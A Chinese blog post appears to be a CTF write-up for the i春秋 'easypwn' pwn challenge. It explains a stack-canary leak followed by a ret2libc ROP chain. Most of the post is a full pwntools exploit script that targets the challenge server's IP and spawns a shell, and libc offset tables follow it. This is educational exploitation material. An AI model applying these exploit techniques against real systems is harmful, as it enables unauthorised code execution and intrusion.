Ichunqiu_Easypwn

最新推荐文章于 2024-02-03 02:09:42 发布
最新推荐文章于 2024-02-03 02:09:42 发布
阅读量4k 收藏
点赞数
分类专栏: CTF Pwn
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/86683367
版权
Pwn 同时被 2 个专栏收录
28 篇文章 8 订阅
订阅专栏
CTF
22 篇文章 4 订阅
订阅专栏

轮回池前彼岸花 三生石旁那道疤
擦不去的眼中莎 泪眼迷离失去她
https://cc-sir.github.io/2019/01/28/ichunqiu_easypwn/

方法

这道题是i春秋CTF的一道题,也是“百度杯”CTF比赛 十二月场中的一道pwn,这道题比较简单
我们先看看这道题的保护机制:

sir@sir-PC:~/desktop$ checksec easypwn
[*] '/home/sir/desktop/easypwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

开启了Stack,所以肯定需要我们泄露出Stack;
运行程序看看:

sir@sir-PC:~/desktop$ ./easypwn 
Hello!I am the smartest robot in the universe!
Who are you?
aaaa
Your name aaaa
 sounds so stupid!
But you don't looks like a fool,isn't it?
so why don't tell me your real name?
bbbb
Oh!This one is better,nice to meet you!
Goodbye!See you again!

有两个输入点,通过ida查看发现,我们可以第一次输入泄露出stack,然后在第二次输入泄露出某函数的地址找到libc,然后就是计算出system函数和"/bin/sh"字符串的位置,然后再让其跳转会main函数,执行system("/bin/sh"),获得shell

EXP

from pwn import *
from LibcSearcher import LibcSearcher
#p = process('./easypwn')
p = remote('106.75.2.53', 10002)
elf = ELF('./easypwn')
context.log_level = 'debug'
p.recvuntil('Who are you?\n')
p.sendline('a'*72)
p.recvuntil('a'*72)
canary = u64(p.recv(8))-0xa
print "cannary: " + hex(canary)
p.recvuntil('tell me your real name?\n')
pop_rdi_addr = 0x4007f3
payload = 'A'*(0x50-0x8)
payload += p64(canary)
payload += 'A'*0x8
payload += p64(pop_rdi_addr)
payload += p64(elf.got['__libc_start_main'])
payload += p64(elf.plt['puts'])
payload += p64(0x4006C6)
p.send(payload)
p.recvuntil('See you again!\n')
__libc_start_main_addr = u64(p.recvuntil('\n',drop=True).ljust(0x8,'\x00'))
log.info('__libc_start_main_addr:'+hex(__libc_start_main_addr))
system_addr = __libc_start_main_addr + 0x24c50 //0x24c50是通过网站找到的
binsh_addr = __libc_start_main_addr + 0x16c617 //0x16c617是通过网站找到的
print "system_addr: " + hex(system_addr)
print "binsh_addr: " + hex(binsh_addr)
print "got_shell:"
p.recvuntil('Who are you?\n')
p.sendline('a'*5)
p.recvuntil('tell me your real name?\n')
payload = 'A'*(0x50-0x8)
payload += p64(canary)
payload += 'A'*0x8
payload += p64(pop_rdi_addr)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += 'a'*8
p.send(payload)
p.interactive()

当我们泄露出__libc_start_main函数的地址后,通过网站https://libc.blukat.me去查询libc的版本,然后就可以找到system函数和"/bin/sh"字符串的地址了

libc database search


Query                   show all libs / start over

__libc_start_main       740
 
+ Find
 
Matches
libc6_2.23-0ubuntu10_amd64
libc6_2.23-0ubuntu3_amd64


libc6_2.23-0ubuntu10_amd64                      Download
    Symbol	                Offset	    Difference
	__libc_start_main		0x020740	0x0
	system	                0x045390	0x24c50
	open	                0x0f7030	0xd68f0
	read	                0x0f7250	0xd6b10
	write	                0x0f72b0	0xd6b70
	str_bin_sh	        	0x18cd57	0x16c617

All symbols

小结

如果是本地的话也可以使用LibcSearcher来查找libc版本,不过感觉速度慢而且不太准确,但是还是可以参考;而且在泄露函数地址是建议泄露__libc_start_main函数

钞sir
关注
专栏目录
“百度杯”CTF比赛 十二月场easypwn
红凳子的博客
04-04 693
“百度杯”CTF比赛 十二月场easypwn前言一、程序分析二、漏洞利用exploit 前言 在这篇文章中将学习到泄露canary、ret2scu和ret2syscall 一、程序分析 从中可以看出该程序为64位动态链接的ELF文件,开启了canary保护,需要想办法绕过。 绕过canary的方法分为两种,一种为直接泄露canary的值,另一种为覆盖canary的值。 这里选择泄露canary的值,可以看出canary的位置在[rbp-8h]处,接着想办法泄露出[rbp-8h]处数据。 从源码中可以
2021巅峰极客ichunqiu_baby-maze
qq_43583624的博客
07-31 3777
2021巅峰极客ichunqiu_baby-maze 题目来源和附件 Written by Poilzero(blog:poilzero.sipc115.club) 同步转发到简书和CSDN 题目来源: 2021巅峰极客网络安全技能挑战赛 reverse方向 baby_maze 个人解题目录和部分所需程序(含题目附件): https://poil.lanzoui.com/iOpu1s329mj 思路 程序逻辑 迷宫,输入WASD进行方向移动,Q是退出。 答案就是flag{md(输入的WASD组
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3963
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
easypwn
zip471642048的博客
12-01 297
esaypwn
roarctf_2019_easy_pwn
hanabi_sh
12-20 566
buuctf pwn roarctf_2019_easy_pwn off-by-one
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 361
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
攻防世界easypwn
weixin_44447516的博客
08-01 562
攻防世界 EasyPwn
180129 逆向-ichunqiu(SimpleGame)
whklhhhh的博客
02-01 757
1625-5 王子昂 总结《2018年1月28日》 【连续第485天总结】 A. ichunqiu-SimpleGame B. 比起上题来说要复杂很多,但是代码读起来还是挺清晰的…算是中档题吧… 国赛的数独代码太乱了给我留下太深的阴影…… 分析 言归正传,首先查壳,发现UPX,轻松脱掉进行反编译 通过fgets接收输入以后,首先两个格式check,之后执行三个函数要求全不
ichunqiu CTF 训练 Basic 全解
Darenfy 随记
01-21 554
本文题目出自 ichunqiu CTF大本营 的 Basic 题目 1. 来看一下 flag 格式 直接提交 flag 即可 2. Audio Problems 题目内容: We intercepted the audio signal it sounds like there could be something hidden in it. Can you take a look and see if you can find anything? 下载文件,可以看到是一个 .wav 音频文件 打开之后
180128 逆向-ichunqiu(Nonstandard)
whklhhhh的博客
01-31 512
1625-5 王子昂 总结《2018年1月27日》 【连续第484天总结】 A. ichunqiu-Nonstandard B. 强网杯100dt的GF要了我的命,150dt的这题却这么简单……OTZ运行看到是很直接的CUI程序,欣喜若狂拖入IDA从main函数往下走,都是很明显的接受输入、校验长度 然后在核心函数中对输入进行变换,再与一个硬编码字符串比较核心函数之前进行了一些准备工作,
WICCTF-2021-easypwn
05-12
2021津门杯ctf的第一道pwn题。
https://bbs.ichunqiu.com/portal.php运用爬虫技术对该网站进行数据爬取并解析输出保存在excel中
最新发布
09-08
df.to_excel('ichunqiu_posts.xlsx', index=False) # 注意:以上代码是假设性的,需要根据实际网页结构进行调整。 ``` 在运行上述代码之前,请确保你已经安装了所需的库:requests, beautifulsoup4, pandas。
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3063
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
[BUUCTF]-PWN:roarctf_2019_easy_pwn解析
2301_79326813的博客
02-03 1536
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块10字节的话,就可以多溢出一个字节,存在off by one漏洞。
“百度杯“ 十二月场 easypwn
baiyeguang的博客
03-14 721
题目链接 程序分析 查看程序保护机制 开启了canary保护,想办法绕过,这里选择泄露canary 可以看出canary的位置在[rbp-8]处,接着想办法泄露出[rbp-8]处数据 从源码中可以看出此处可以栈溢出,且canary位置为0x50-8,由于程序在接收到我们的输入之后会返回回来,所以如果我们可以覆盖掉canary低位的0x00就可以将canary一起打印出来,这里如果我们用sen...
i春秋-Linux pwn 入门
liminglei960316的博客
07-16 1205
一环境准备(64位)                     目标代码:与i春秋上有一点点区别,不同处标黄。                         #include <stdio.h>                             int hello()                                 {                  ...
CTF 一次PWN解题的小技巧
yy1715713348的博客
07-22 471
行文至此,本次测试也就结束了!文章略长,简单做个总结:在本文中,我们通过使用CTF示例讨论了漏洞利用开发的过程,我们了解了程序如何从argv和argc接收输入的参数。最后,了解了由于较小的随机范围,32位系统中的ASLR为何容易受到攻击,以及如何利用此漏洞进行攻击。我们可以使用 "scp "命令轻松地将我们的脚本上传到服务器的tmp目录下,就像这样。[外链图片转存中…(img-lYig6HAY-1690015362559)]终于拿到了我们的flag!行文至此,本次测试也就结束了!
攻防世界-PWN进阶区-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 2022
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT表 main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲区大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
【Writeup】i春秋 Linux Pwn 入门教程_EasyCTF 2017-doubly_dangerous
BAKUMANSEC - Just Do It
08-20 824
Linux pwn入门教程(1)——栈溢出基础 0x01 解题思路 查看文件信息并试运行 ​ 开启了NX,栈上无法执行代码。 拖入IDA 32bits,F5查看 ​ main 显然存在栈溢出漏洞,目前存在两种思路: 覆盖RIP为give_flag地址,执行give_flag函数 覆盖v5的值为11.28125,使其通过判断执行give_flag函数 通过尝试发现,按...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值